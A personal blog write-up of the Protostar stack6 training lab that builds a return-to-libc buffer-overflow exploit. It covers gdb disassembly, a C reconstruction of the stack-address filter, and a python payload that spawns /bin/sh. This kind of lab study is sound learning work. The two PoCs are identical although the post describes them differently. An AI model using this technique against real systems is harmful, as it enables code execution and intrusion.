Exploit Exercises - Protostar Stack 6

It is free time, so I had some time to play exploit-exercises. Today I play stack level 6. I learned something from it about return-to-libc.
Use gdb to disassemble:
#gdb -q /opt/protostar/bin/stack6 
(gdb) disas main
Dump of assembler code for function main:
0x080484fa :    push   %ebp
0x080484fb :    mov    %esp,%ebp
0x080484fd :    and    $0xfffffff0,%esp
0x08048500 :    call   0x8048484
0x08048505 :    mov    %ebp,%esp
0x08048507 :    pop    %ebp
0x08048508 :    ret
End of assembler dump.
(gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 :    push   %ebp
0x08048485 :    mov    %esp,%ebp
0x08048487 :    sub    $0x68,%esp
0x0804848a :    mov    $0x80485d0,%eax
0x0804848f :    mov    %eax,(%esp)
0x08048492 :    call   0x80483c0
0x08048497 :    mov    0x8049720,%eax
0x0804849c :    mov    %eax,(%esp)
0x0804849f :    call   0x80483b0
0x080484a4 :    lea    -0x4c(%ebp),%eax
0x080484a7 :    mov    %eax,(%esp)
0x080484aa :    call   0x8048380
0x080484af :    mov    0x4(%ebp),%eax
0x080484b2 :    mov    %eax,-0xc(%ebp)
0x080484b5 :    mov    -0xc(%ebp),%eax
0x080484b8 :    and    $0xbf000000,%eax
0x080484bd :    cmp    $0xbf000000,%eax
0x080484c2 :    jne    0x80484e4
0x080484c4 :    mov    $0x80485e4,%eax
0x080484c9 :    mov    -0xc(%ebp),%edx
0x080484cc :    mov    %edx,0x4(%esp)
0x080484d0 :    mov    %eax,(%esp)
0x080484d3 :    call   0x80483c0
0x080484d8 :    movl   $0x1,(%esp)
0x080484df :    call   0x80483a0 <_exit@plt>
0x080484e4 :    mov    $0x80485f0,%eax
0x080484e9 :    lea    -0x4c(%ebp),%edx
0x080484ec :    mov    %edx,0x4(%esp)
0x080484f0 :    mov    %eax,(%esp)
0x080484f3 :    call   0x80483c0
0x080484f8 :    leave
0x080484f9 :    ret

Set breakpoints at the call to getpath and at getpath+116 (the leave at 0x080484f8, just before returning to main with the overflowed return address):
(gdb) info breakpoints 
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x08048500 in main at stack6/stack6.c:27
        breakpoint already hit 1 time
2       breakpoint     keep y   0x080484f8 in getpath at stack6/stack6.c:23
        breakpoint already hit 1 time
Generate the payload. Use the Metasploit pattern tool to find the padding; it is 80.
python -c 'print "A"*80+ "BBBB"'
It crashed with eip pointing to 0x42424242: control of eip is done!
When you review the source code, you will see that it checks the return address is not in 0xbfxxxxxx (the stack). So to exploit it, you need return-to-libc (many tutorials use ROP; I think it is not needed).
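To see exactly what that check lets through, here is a small C reconstruction of the filter from the getpath disassembly above. This is an added example, not the stack6 source; the addresses are the ones used in this post's payload.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Reconstruction of the filter in getpath (from the disassembly above):
 *   mov 0x4(%ebp),%eax        ; saved return address
 *   and $0xbf000000,%eax
 *   cmp $0xbf000000,%eax
 *   jne <print "got path">    ; otherwise "bzzzt" and _exit(1)
 * Returns true when stack6 would refuse to return to ret. */
bool stack6_rejects(uint32_t ret)
{
    return (ret & 0xbf000000u) == 0xbf000000u;
}

/* The mask only tests the bits that are SET in 0xbf (bit 6 of the top
 * byte is ignored), so this counts how many of the 256 possible top
 * bytes the check actually rejects. */
int count_rejected_top_bytes(void)
{
    int n = 0;
    for (uint32_t b = 0; b < 256; b++)
        if (stack6_rejects(b << 24))
            n++;
    return n;
}

int main(void)
{
    /* Sample addresses: the ones used in this post's payload. */
    const struct { const char *what; uint32_t addr; } samples[] = {
        { "stack, /bin/sh string (0xbffff6c8)", 0xbffff6c8u },
        { "libc system()         (0xb7ecffb0)", 0xb7ecffb0u },
        { "libc exit()           (0xb7ec60c0)", 0xb7ec60c0u },
        { "binary, getpath       (0x08048484)", 0x08048484u },
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%s -> %s\n", samples[i].what,
               stack6_rejects(samples[i].addr) ? "bzzzt (rejected)" : "accepted");
    printf("top bytes rejected by the mask: %d of 256\n",
           count_rejected_top_bytes());
    return 0;
}
```

Only top bytes 0xbf and 0xff are rejected, so a return into libc (0xb7...) or into the binary itself passes; a filter like this is not a substitute for a stack canary, NX and ASLR.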
In gdb, p system and p exit give the function addresses.
This is the payload layout. Set the string for system()'s parameter in an environment variable: export SHELL2='/bin/sh'. Then get the address of that environment entry and add 7 (len("SHELL2=") = 7) to skip the name.
| "A"*80 to fill | system() address |  exit() address | /bin/sh address |
Use the (payload; cat) | stack6 trick to keep the shell open after it spawns.
This is the PoC using the environment variable: (python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6
Then I need to use /bin/sh inside the PoC. So I chose to put /bin/sh at the end of the PoC:
| "A"*80 to fill | system() address |  exit() address | /bin/sh address | /bin/sh string |
Take the string's address from a gdb memory dump and add 0x30 to get the address in the real (non-gdb) process.
This is the PoC:
(python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6


Thanks for reading